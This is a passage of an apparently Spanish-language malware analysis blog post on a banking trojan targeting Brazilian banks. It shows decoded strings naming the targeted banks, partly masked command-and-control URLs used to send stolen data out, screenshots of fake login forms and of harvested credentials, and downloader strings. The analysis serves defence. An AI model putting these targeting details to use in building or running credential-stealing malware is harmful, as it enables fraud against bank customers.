<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F1002CE31A16130F0D75939FF0C739880E74E3251D1C150C3CFD184E8A80D90A5F9D5A85F52CDC74</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">27D512C578F076E857A33EF266A95FA65C2A48BF767DA42F42660FA4C4297CF0E3DD548FE2DD5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">53DE57CCB4A788F569ADD73E5ABAD7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">E013DF17C946231F1D65A9EF1C63A890979F948E28D84FB0CCDC9CE3C4D4492C5649C5C8DF12AAB2C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">7BB976A954CCAD918FFB00167A858AF270F67CE656CBB247F4117693F21AB022DF0F3C2CD677DE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2B0667DC45343F201B61BBD4385E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F40723D40B0760C2BEC4C8CE3D42493330363D252140D7484B5D10452B822B228D4033E2AD071D8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F938F42AD44D2A1408729EF41B64AB9592949B87F66AD16497F35D868CC114B258F26D9B4EF6</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">011FD679A04CE71BC3205114A8DC6DF7A8AA9472FB22CE0A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">B05E9B5389B049FD33CAB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A0A6B257F527CCA314B8397C00344789A55291A35188BC51</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">222DF813DC17785</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C04CE70E3CE000A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">52F461</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">73958EBD6w0E61EDF0C35B9931A722B2689AA1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0D2CC8B56e7A240</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2BCE6BDA003BF8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">29CB18CF0E0A6FD348B2DE355BA4EB54D352D9403F3229DB1D79ED6AA03AAA20DC1BC6B2699933</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">63915E914CC44A59987F3187E828D82FA78FE74EE6EE35BED2B6FA8E5276EF86C9E5980A99D469738</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">985B974FF16ECBB7A5ED1278848B80F87EF87EE454CDB447F2174F8D85DE75EA11CF73E712329B</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Decodifican como:</span></b></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Internet Explorer_Server</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[bb.com.br]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bancobrasil.com.br</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Caixa Econômica Federal</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">internetbankingcaixa</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">30 horas</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Sicredi Total</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[bb.com.br]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bancobrasil.com.br</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Caixa Econômica Federal</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">internetbankingcaixamozillafirefox</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Internet Banking - Mozilla Firefox</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">30 horas - Mozilla Firefox</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[bb.com.br]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bancobrasil.com.br</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Caixa Econômica Federal</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">internetbankingcaixagooglechrome</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Internet Banking - Google Chrome</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">30 horas</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1xx.xx.xx.xxx6 (x eliminado por seguridad)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.xx.xx.xxx6/av/ad/acesso.php</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.xx.xx.xxx6/ct/my/manda.php</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.xx.xx.xxx6/av/058/acesso.php</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.xx.xx.xxx6/ct/058/manda.php</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.xx.xx.xxx6/av/af/acesso.php</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.xx.xx.xxx6/ct/va/manda.php</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Documents and Settings</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Settings\</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\Dados de aplicativos\</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Users\</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Users\</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\D</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\AppData\Roaming\</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">id.sys</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">id.sys</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.xx.xx.xxx6/av/ad/acesso.php</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.xxx.xx1.xx/av/058/acesso.php</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.9xx.1xx.1xx/av/af/acesso.php</span></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Imágenes de los formularios falsos invocados por la amenaza.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMaZrlJCvLQYtwfr7ELb2cgKYbTU2TSBnUyn3YfbcMwzCScOwxCF73-3WdLMbNNSJMCQfcymOmfqixuVbWHX0KJSaTNBt3tEjrayfAPhltimgmLOCVyd62Wr2ZXwGYqVuGI8C7FVXZ74w/s1600/Image4.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMaZrlJCvLQYtwfr7ELb2cgKYbTU2TSBnUyn3YfbcMwzCScOwxCF73-3WdLMbNNSJMCQfcymOmfqixuVbWHX0KJSaTNBt3tEjrayfAPhltimgmLOCVyd62Wr2ZXwGYqVuGI8C7FVXZ74w/s1600/Image4.Picture.Data.png" height="184" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxsabAT1GjYMegZFf4_A_fU86NmwiEG4JcXqO-8bI5tRW0X8etEVFyKih3Qu0wQj-6W_IinfkjlFvXM8g8IUf5kAjaJK483Yg1o2MqsDQXr207eZeBjQo28jHkD_Z0ZYxLxodUh3vFzxQ/s1600/Image6.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxsabAT1GjYMegZFf4_A_fU86NmwiEG4JcXqO-8bI5tRW0X8etEVFyKih3Qu0wQj-6W_IinfkjlFvXM8g8IUf5kAjaJK483Yg1o2MqsDQXr207eZeBjQo28jHkD_Z0ZYxLxodUh3vFzxQ/s1600/Image6.Picture.Data.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj81ogzaoK2ti3cvXqRyUX0W6QKTQ1hrRlbLGLfOoBL_J3gq0wYKLj6Kr492D0oKPtS3QZX4J2NKbk9vc7xHvIf52vaOtPbWOv1iwb-6NyX9CpWFQwUwoEiFtRgM6OQDRodVbfGtU4AczM/s1600/Image9.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj81ogzaoK2ti3cvXqRyUX0W6QKTQ1hrRlbLGLfOoBL_J3gq0wYKLj6Kr492D0oKPtS3QZX4J2NKbk9vc7xHvIf52vaOtPbWOv1iwb-6NyX9CpWFQwUwoEiFtRgM6OQDRodVbfGtU4AczM/s1600/Image9.Picture.Data.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq9Sz_om8NN-ipJfIkPFisRE1iDxMujAPdsCCEjPgtZiM1wEuZaWsquvg8mUX9Nj7zqr2txcw7Romo6Rldq6RYqguWLWcdsPMvrKDir6aydodeahouHtAE5gR0J_qFKMYMAFs6uUuwOsw/s1600/Image10.Picture.Data.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq9Sz_om8NN-ipJfIkPFisRE1iDxMujAPdsCCEjPgtZiM1wEuZaWsquvg8mUX9Nj7zqr2txcw7Romo6Rldq6RYqguWLWcdsPMvrKDir6aydodeahouHtAE5gR0J_qFKMYMAFs6uUuwOsw/s1600/Image10.Picture.Data.gif" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL7H_egCTDPpnWwVu4P9qOW78TuXOtzutUCkJig3-mWPEDYL3xmAFa7p7zyaVuQpr6w7fea9fKqv67i1rZdGL3fh6OPUKkyob_Kf_ycxj7or1ZBSf6OijSFojL_99Mrz-mhaU5DZHGREo/s1600/Image14.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL7H_egCTDPpnWwVu4P9qOW78TuXOtzutUCkJig3-mWPEDYL3xmAFa7p7zyaVuQpr6w7fea9fKqv67i1rZdGL3fh6OPUKkyob_Kf_ycxj7or1ZBSf6OijSFojL_99Mrz-mhaU5DZHGREo/s1600/Image14.Picture.Data.png" height="161" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj32dGl-baSQSCCyrffhoRirOwlK4Q2iwmVnAQVD7L1qiwplS8LPRqeArnEIkJ-PAoUzEZixETFpmY7d6bPEYjZ35ZyAYybFI9l4S6qrnWspGVVtidUQ1ENLlwEN1hdKxCK4xwWNTX4h64/s1600/Image17.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj32dGl-baSQSCCyrffhoRirOwlK4Q2iwmVnAQVD7L1qiwplS8LPRqeArnEIkJ-PAoUzEZixETFpmY7d6bPEYjZ35ZyAYybFI9l4S6qrnWspGVVtidUQ1ENLlwEN1hdKxCK4xwWNTX4h64/s1600/Image17.Picture.Data.png" height="92" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidzyMCNj3L43NoO2nJea6KSFzcm1MseOgPFB3IRhRP1UjEKm-X8DtXcks3lbYwKQ01MkGqOS7RVX13rXZLSvlEue0H2-hu6y6YhRGNmg6Kjc8jqPnKkLrXUOOGN18EJ72epcoJW5rx1hk/s1600/Image25.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidzyMCNj3L43NoO2nJea6KSFzcm1MseOgPFB3IRhRP1UjEKm-X8DtXcks3lbYwKQ01MkGqOS7RVX13rXZLSvlEue0H2-hu6y6YhRGNmg6Kjc8jqPnKkLrXUOOGN18EJ72epcoJW5rx1hk/s1600/Image25.Picture.Data.png" /></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEindA9iiXW7hpZgdnR3CJiY1iiZg2L1mYiwy7yc8luxUVdrgSVJrX1UGCs1V99AhMgpNsh4rTEvSiMNb5ta7iKveeS_Rnxzc_CoLRCrV1wZLTWTqat5NERSupeANtNxWhHdKYSBM9gSpW4/s1600/Image3.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEindA9iiXW7hpZgdnR3CJiY1iiZg2L1mYiwy7yc8luxUVdrgSVJrX1UGCs1V99AhMgpNsh4rTEvSiMNb5ta7iKveeS_Rnxzc_CoLRCrV1wZLTWTqat5NERSupeANtNxWhHdKYSBM9gSpW4/s1600/Image3.Picture.Data.png" height="159" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIeOIOvk_r8CIrv4C9wKtWURoVaWdvEl0xPON4DY4x1uKPGUKEuFV6yp1Xepx0IDcZzBRZ5vEOxSwvwmciKYWZ3uKIF14SIwCVlkPkPFLx8SkURiP7Mi_df0yxTWThE5bg8Mb6yDEg9tg/s1600/Image4.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIeOIOvk_r8CIrv4C9wKtWURoVaWdvEl0xPON4DY4x1uKPGUKEuFV6yp1Xepx0IDcZzBRZ5vEOxSwvwmciKYWZ3uKIF14SIwCVlkPkPFLx8SkURiP7Mi_df0yxTWThE5bg8Mb6yDEg9tg/s1600/Image4.Picture.Data.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9WL0sXMQQwYtXWjNTonJuBU_VAMx7iV3lly5dO130ENvrXxdC8vruTUsbVL7hSX5RkQXTANmaNK_46o0SDa9y_uEHa8gEyg36R6_4CKS6Sv6syukbiwc_jKu_OEEfJbU-pIz9ob2lNY/s1600/Image5.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9WL0sXMQQwYtXWjNTonJuBU_VAMx7iV3lly5dO130ENvrXxdC8vruTUsbVL7hSX5RkQXTANmaNK_46o0SDa9y_uEHa8gEyg36R6_4CKS6Sv6syukbiwc_jKu_OEEfJbU-pIz9ob2lNY/s1600/Image5.Picture.Data.png" height="39" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb0Py2vSzl7rHNUkOIyC_zzGrvYrNizHzY5xjtoiFDocgGiCh6poSEvFG9krFfZxZ04Tn7tR98YfX6Nph0mHrSF7ozsRu5j1W-TO_afCrHurUQTNS6dJVHItx9JQCO1mUl9m-N6qUG4Nw/s1600/Image7.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb0Py2vSzl7rHNUkOIyC_zzGrvYrNizHzY5xjtoiFDocgGiCh6poSEvFG9krFfZxZ04Tn7tR98YfX6Nph0mHrSF7ozsRu5j1W-TO_afCrHurUQTNS6dJVHItx9JQCO1mUl9m-N6qUG4Nw/s1600/Image7.Picture.Data.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUKThGPhMQKzrzho4w0TKbvdHLws9ewdaGeuIn55ycBEr2uYv1WAzk91_DcQoMEiSSnwQssEvJmPqpz1Aj4tMcX_N1NUi6k8H8Igg7l9nz04Ed6O_8scLArMv49G3plNUEHbRCHvQB8JU/s1600/Image11.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUKThGPhMQKzrzho4w0TKbvdHLws9ewdaGeuIn55ycBEr2uYv1WAzk91_DcQoMEiSSnwQssEvJmPqpz1Aj4tMcX_N1NUi6k8H8Igg7l9nz04Ed6O_8scLArMv49G3plNUEHbRCHvQB8JU/s1600/Image11.Picture.Data.png" height="119" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2XR-NC-mjml8cPSZftOlEm8V2Lpizq-qiGVI0cXjK9kObC5L7ZANa37SMTyeIrp6xnHVD0YL_hBS-H9NvpQRsVKL4cQq_xm-qSST7_8-W6XCk4IbniZV1pASrCRDNqFdNmU4VBflfhHo/s1600/Image14.Picture.Data.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2XR-NC-mjml8cPSZftOlEm8V2Lpizq-qiGVI0cXjK9kObC5L7ZANa37SMTyeIrp6xnHVD0YL_hBS-H9NvpQRsVKL4cQq_xm-qSST7_8-W6XCk4IbniZV1pASrCRDNqFdNmU4VBflfhHo/s1600/Image14.Picture.Data.gif" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfsVz3gE2AMySFTnCbMqYFhGjE0MWEp3InuGM5HIMyj2yOpFiEQNG6ZAMbTtrOQPvpIUC0yp7Ct7cCLkd6bLnOQVDQBNrRvrphsQPJQvr7SMxPWffo4Hzf22NdnwgWc4FGW7h050G87mQ/s1600/Image19.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfsVz3gE2AMySFTnCbMqYFhGjE0MWEp3InuGM5HIMyj2yOpFiEQNG6ZAMbTtrOQPvpIUC0yp7Ct7cCLkd6bLnOQVDQBNrRvrphsQPJQvr7SMxPWffo4Hzf22NdnwgWc4FGW7h050G87mQ/s1600/Image19.Picture.Data.png" height="46" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpLutyxXOe9W73abb3oq23xuoL_be3kCweGZrpvgYnpkRC6bOBYeOtf1qoYAoJYfFG7OZLaPJ78Xm52YJHE8vMIFLHfRyPm4lq-_x_BL5-Dr_p39ZFMCDsLV-CGLXMQLUx9NOGjx6lF4c/s1600/Image22.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpLutyxXOe9W73abb3oq23xuoL_be3kCweGZrpvgYnpkRC6bOBYeOtf1qoYAoJYfFG7OZLaPJ78Xm52YJHE8vMIFLHfRyPm4lq-_x_BL5-Dr_p39ZFMCDsLV-CGLXMQLUx9NOGjx6lF4c/s1600/Image22.Picture.Data.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS078iiUmWcc5e38oAy3vCRIu6Ekg4D5maRAE_T_sbB9OPlePDo4QveVkcRB6Jel9XvM1BNXEX8K36PUMcoyHDk3clicuzSShVWHCPRGV7RWKcKKrlhsJHsdAhI7sWU-JMHYI0qNVEgFE/s1600/bancodobrasil.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS078iiUmWcc5e38oAy3vCRIu6Ekg4D5maRAE_T_sbB9OPlePDo4QveVkcRB6Jel9XvM1BNXEX8K36PUMcoyHDk3clicuzSShVWHCPRGV7RWKcKKrlhsJHsdAhI7sWU-JMHYI0qNVEgFE/s1600/bancodobrasil.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIbu9nZOc1hzfTpA0ZXXhgt1M7Zfhh42wcFRrv5TnlaxMsJSHFrG-0P5nSy0_9vxoCG1VTobHV8L5mu9HlBQplbj-pqBFP5yAlcvYh5vG7Jl-BuGXaNasfdBqJFY8cGBEjsahw5gYanqI/s1600/caixa.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIbu9nZOc1hzfTpA0ZXXhgt1M7Zfhh42wcFRrv5TnlaxMsJSHFrG-0P5nSy0_9vxoCG1VTobHV8L5mu9HlBQplbj-pqBFP5yAlcvYh5vG7Jl-BuGXaNasfdBqJFY8cGBEjsahw5gYanqI/s1600/caixa.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Datos guardados en el servidor mediante <b>manda.php</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKkOA0Cw3PsVeF8xC_AFZ7wUdHEevZDGpev3LLK7paW6ECJAQlhGVsgOadzoEKX6NzYkAjrOLVxk0vlFHqo6w00KKO1ST05Gr4pfSEbbis1BJ1a8qZQL7VXHWjB3X_8-NfOVtxH6U8NnQ/s1600/datosrobados-c.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKkOA0Cw3PsVeF8xC_AFZ7wUdHEevZDGpev3LLK7paW6ECJAQlhGVsgOadzoEKX6NzYkAjrOLVxk0vlFHqo6w00KKO1ST05Gr4pfSEbbis1BJ1a8qZQL7VXHWjB3X_8-NfOVtxH6U8NnQ/s1600/datosrobados-c.jpg" height="640" width="404" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Datos encontrados en el servidor:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Gmail</span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3Lx3OLqjWZBlLJQPT_bVMqghaRJK_11aJ2Cmkep2I17Jdrjwr8rGgetyN9SKW5bAepdigvO4OfN_o1_JK-fBNT73UfrNbbotYJ-3A7U8S0fpqTmUkIf7w810WncUJxxBJ_YqNLqPHIak/s1600/gmail.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3Lx3OLqjWZBlLJQPT_bVMqghaRJK_11aJ2Cmkep2I17Jdrjwr8rGgetyN9SKW5bAepdigvO4OfN_o1_JK-fBNT73UfrNbbotYJ-3A7U8S0fpqTmUkIf7w810WncUJxxBJ_YqNLqPHIak/s1600/gmail.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Uol</span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuZ4eFt1GCqiP1HMbdTynKZ7luvbWMqZIjBocSbU6gqLrMDqUtFiJSP-701x5Qzi2FGMjHIyrd1UK1NCHgTDTtxvVanNUUvblt0iyDEFlEF_VT30U_3877uukbajzSuXMjEM1YFWOejFs/s1600/uol-b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuZ4eFt1GCqiP1HMbdTynKZ7luvbWMqZIjBocSbU6gqLrMDqUtFiJSP-701x5Qzi2FGMjHIyrd1UK1NCHgTDTtxvVanNUUvblt0iyDEFlEF_VT30U_3877uukbajzSuXMjEM1YFWOejFs/s1600/uol-b.jpg" height="640" width="358" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Datos Bancarios/Boletos</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJY9GKrMhP88iBzSebyp_q22G0_-XWYmL0R5t4EegOHNKb0nLP4M4RhyIehAAeRWJKYpIZ7mtcC5EPNQoJMrdtsJIcRUmyfSu6XQ4D2rz1YocyqRFhCZBhCFEODzErPWl3Zrth4zHiOz8/s1600/datosbancarios.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJY9GKrMhP88iBzSebyp_q22G0_-XWYmL0R5t4EegOHNKb0nLP4M4RhyIehAAeRWJKYpIZ7mtcC5EPNQoJMrdtsJIcRUmyfSu6XQ4D2rz1YocyqRFhCZBhCFEODzErPWl3Zrth4zHiOz8/s1600/datosbancarios.jpg" height="282" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>5.txt </b>(es un cpl que es cargado en memoria por el downloader)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analisis en V.T. </span></div>
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1MHv8DWvFK3_dodnXyUSmDcNCADzgKOO25LLlK8F54Qma8AK5c1puUIu9MyjO_oBZU5a_0otKWgKQFgSVQyU9M_N-VkT4-r9tpjILxvDHFRnXF5FXP9X_9EsSxyZo6SEdf3Ir8etDRM0/s1600/vt3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1MHv8DWvFK3_dodnXyUSmDcNCADzgKOO25LLlK8F54Qma8AK5c1puUIu9MyjO_oBZU5a_0otKWgKQFgSVQyU9M_N-VkT4-r9tpjILxvDHFRnXF5FXP9X_9EsSxyZo6SEdf3Ir8etDRM0/s1600/vt3.jpg" height="186" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Strings:</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489DF0 <ansistring> 'ServletGeraImg?acao=barra'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E14 <ansistring> '984'</ansistring></span></div>
